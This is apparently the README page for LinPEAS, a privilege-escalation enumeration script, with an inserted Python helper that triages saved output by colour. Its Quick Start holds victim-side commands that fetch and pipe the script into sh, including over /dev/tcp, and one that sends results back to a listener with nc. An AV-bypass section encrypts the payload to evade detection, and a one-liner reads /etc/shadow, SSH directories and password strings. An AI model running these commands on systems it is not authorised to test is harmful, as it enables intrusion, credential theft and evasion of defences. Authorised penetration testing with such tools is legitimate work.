PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub

2023-03-13 05:46:10 [*]

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz

Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz.


MacPEAS

Simply execute linpeas.sh in a MacOS system and the MacPEAS module will be automatically executed

Quick Start

Find the latest versions of all the scripts and binaries in the releases page.

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network
sudo python -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim

# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim

# Execute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
# Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colours
# Use a linpeas binary
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
chmod +x linpeas_linux_amd64
./linpeas_linux_amd64
# Execute from memory in Penelope session
# From: https://github.com/brightio/penelope
> run peass-ng

Firmware Analysis

If you have a firmware and you want to analyze it with linpeas to search for passwords or badly configured permissions you have 2 main options.

  • If you can emulate the firmware, just run linpeas inside it:
cp /path/to/linpeas.sh /mnt/linpeas.sh
chroot /mnt #Supposing you have mounted the firmware FS in /mnt
bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
  • If you can't emulate the firmware, use the -f </path/to/folder param:
# Point to the folder containing the files you want to analyze
bash /path/to/linpeas.sh -f /path/to/folder

AV bypass

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

Basic Information

The goal of this script is to search for possible Privilege Escalation Paths (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).

This script doesn't have any dependency.

It uses /bin/sh syntax, so it can run in anything supporting sh (and the binaries and parameters used).

By default, linpeas won't write anything to disk and won't try to login as any other user using su.

By default linpeas takes around 4 minutes to complete, but it could take from 5 to 10 minutes to execute all the checks using the -a parameter (Recommended option for CTFs):

  • From less than 1 min to 2 minutes to make almost all the checks
  • Almost 1 min to search for possible passwords inside all the accessible files of the system
  • 20s/user bruteforce with top2000 passwords (need -a) – Notice that this check is super noisy
  • 1 min to monitor the processes in order to find very frequent cron jobs (need -a) – Notice that this check will need to write some data inside a file that will be deleted

Interesting parameters:

  • -a (all checks except regex) – This will also execute the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using su with the top2000 passwords.
  • -e (extra enumeration) – This will execute enumeration checks that are skipped by default
  • -r (regex checks) – This will search for a lot of API keys of different platforms in the filesystem
  • -s (superfast & stealth) – This will bypass some time consuming checks – Stealth mode (Nothing will be written to disk)
  • -P (Password) – Pass a password that will be used with sudo -l and bruteforcing other users
  • -D (Debug) – Print information about the checks that haven't found anything and about the time each check took
  • -d/-p/-i/-t (Local Network Enumeration) – Linpeas can also discover and port-scan local networks

This script has several lists included inside of it to be able to colour the results in order to highlight PE vectors.

Enumerate and search Privilege Escalation vectors.
This tool enum and search possible misconfigurations (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...) inside the host and highlight possible misconfigurations with colors.
        Checks:
            -o Only execute selected checks (system_information,container,cloud,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files,api_keys_regex). Select a comma separated list.
            -s Stealth & faster (don't check some time consuming checks)
            -e Perform extra enumeration
            -t Automatic network scan & Internet conectivity checks - This option writes to files
            -r Enable Regexes (this can take from some mins to hours)
            -P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
            -D Debug mode

        Network recon:
            -t Automatic network scan & Internet conectivity checks - This option writes to files
            -d <IP/NETMASK> Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
            -p <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
            -i <IP> [-p <PORT(s)>] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
             Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed

        Port forwarding:
            -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT Execute linpeas to forward a port from a local IP to a remote IP

        Firmware recon:
            -f </FOLDER/PATH> Execute linpeas to search passwords/file permissions misconfigs inside a folder

        Misc:
            -h To show this message
            -w Wait execution between big blocks of checks
            -L Force linpeas execution
            -M Force macpeas execution
            -q Do not show banner
            -N Do not use colors

Hosts Discovery and Port Scanning

With LinPEAS you can also discover hosts automatically using fping, ping and/or nc, and scan ports using nc.

LinPEAS will automatically search for these binaries in $PATH and let you know if any of them is available. In that case you can use LinPEAS for host discovery and/or port scanning.

Colours


LinPEAS uses colors to indicate where each section begins. But it also uses them to identify potential misconfigurations.

The Red/Yellow color is used for identifying configurations that lead to PE (99% sure).

The Red color is used for identifying suspicious configurations that could lead to PE:

  • Possibly exploitable kernel versions
  • Vulnerable sudo versions
  • Identify processes running as root
  • Not mounted devices
  • Dangerous fstab permissions
  • Writable files in interesting directories
  • SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
  • SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
  • Check /etc/doas.conf
  • 127.0.0.1 in netstat
  • Known files that could contain passwords
  • Capabilities in interesting binaries
  • Interesting capabilities of a binary
  • Writable folders and wildcards inside info about cron jobs
  • Writable folders in PATH
  • Groups that could lead to root
  • Files that could contain passwords
  • Suspicious cronjobs

The Green color is used for:

  • Common processes run by root
  • Common not interesting devices to mount
  • Not dangerous fstab permissions
  • SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
  • Common .sh files in path
  • Common names of users executing processes
  • Common cronjobs

The Blue color is used for:

  • Users without shell
  • Mounted devices

The Mild Cyan shade is used for:

The Mild Magenta shade is used for:
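The colour legend above is the fastest way to triage a saved run (for example the /dev/shm/linpeas.txt from the Quick Start) when linpeas is used as a hardening audit. The script below is an added example, not part of linPEAS or this README: it classifies each captured line by the strongest legend colour it carries and groups the red and red/yellow hits by section. The ANSI sequences (\033[1;31;103m red on yellow, \033[1;31m red, \033[1;32m green, \033[1;34m blue) and the ╔══════════╣ section banner are assumed from the script's source, and the sample output is constructed.

```python
import re
import sys
from collections import Counter
# Legend colours as ANSI escapes, assumed from linpeas.sh's colour variables
# (the README only names the colours). Checked strongest first.
RED_YELLOW = "\033[1;31;103m"  # "99% sure" PE vector
RED = "\033[1;31m"             # suspicious, could lead to PE
GREEN = "\033[1;32m"           # common / not interesting
BLUE = "\033[1;34m"            # informational
SEVERITY = [(RED_YELLOW, "likely-pe"), (RED, "suspicious"),
            (GREEN, "benign"), (BLUE, "info")]
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")
SECTION_RE = re.compile(r"╔══════════╣\s*(.+)$")  # section banner (assumed format)

def strip_ansi(line):
    """Remove colour escapes so the text can be reported or grepped."""
    return ANSI_RE.sub("", line)

def classify(line):
    """Return the strongest legend label present in a raw line, or None."""
    for code, label in SEVERITY:
        if code in line:
            return label
    return None

def triage(raw_text):
    """Return (findings, counts): findings are (section, severity, clean_text)
    for red/red-yellow lines, strongest first; counts covers every coloured line."""
    section, findings, counts = "(preamble)", [], Counter()
    for line in raw_text.splitlines():
        clean = strip_ansi(line).strip()
        banner = SECTION_RE.search(clean)
        if banner:                      # new section: keep its title only
            section = banner.group(1).strip()
            continue
        sev = classify(line)
        if sev is None:
            continue
        counts[sev] += 1
        if sev in ("likely-pe", "suspicious"):
            findings.append((section, sev, clean))
    findings.sort(key=lambda f: 0 if f[1] == "likely-pe" else 1)
    return findings, counts

# Constructed sample of a saved run (not real linpeas output).
SAMPLE = "\n".join([
    "\033[1;34m╔══════════╣ \033[1;32mSUID - Check easy privesc, exploits and write perms\033[0m",
    "-rwsr-xr-x 1 root root 55K /usr/local/bin/\033[1;31;103mcustom_tool\033[0m",
    "-rwsr-xr-x 1 root root 67K /usr/bin/\033[1;32mpasswd\033[0m",
    "\033[1;34m╔══════════╣ \033[1;32mInteresting writable files\033[0m",
    "\033[1;31m/etc/cron.d/backup\033[0m",
    "\033[1;34mnobody\033[0m:x:65534:65534::/nonexistent:/usr/sbin/nologin",
    "/tmp/no-colour-here",
])

if __name__ == "__main__":              # python3 triage.py [/dev/shm/linpeas.txt]
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for section, sev, clean in triage(text)[0]:
        print(f"[{sev}] {section}: {clean}")
```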

One-liner Enumerator

Here you have an old linpe version script in one line, just copy and paste it😉

The color filtering is not available in the one-liner (the lists are too big)

This one-liner is deprecated (I am not going to update it any more), but it could be useful in some cases so it will remain here.

The default file where all the data is stored is: /tmp/linPE (you can change it at the beginning of the script)

file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system info...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network info...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users info...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files info...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside $HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to put the password and the result appears in console)\n"$NC >> $file;sudo -l;

PEASS Style

Are you a PEASS fan? Get now our merch at PEASS Shop and show your love for our favourite peas

Collaborate

If you want to help with the TODO tasks or with anything, you can do it using github issues or you can submit a pull request.

If you find any issue, please report it using github issues.

Linpeas is being updated every time I find something that could be useful to escalate privileges.

Advisory

All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

By Polop(TM)
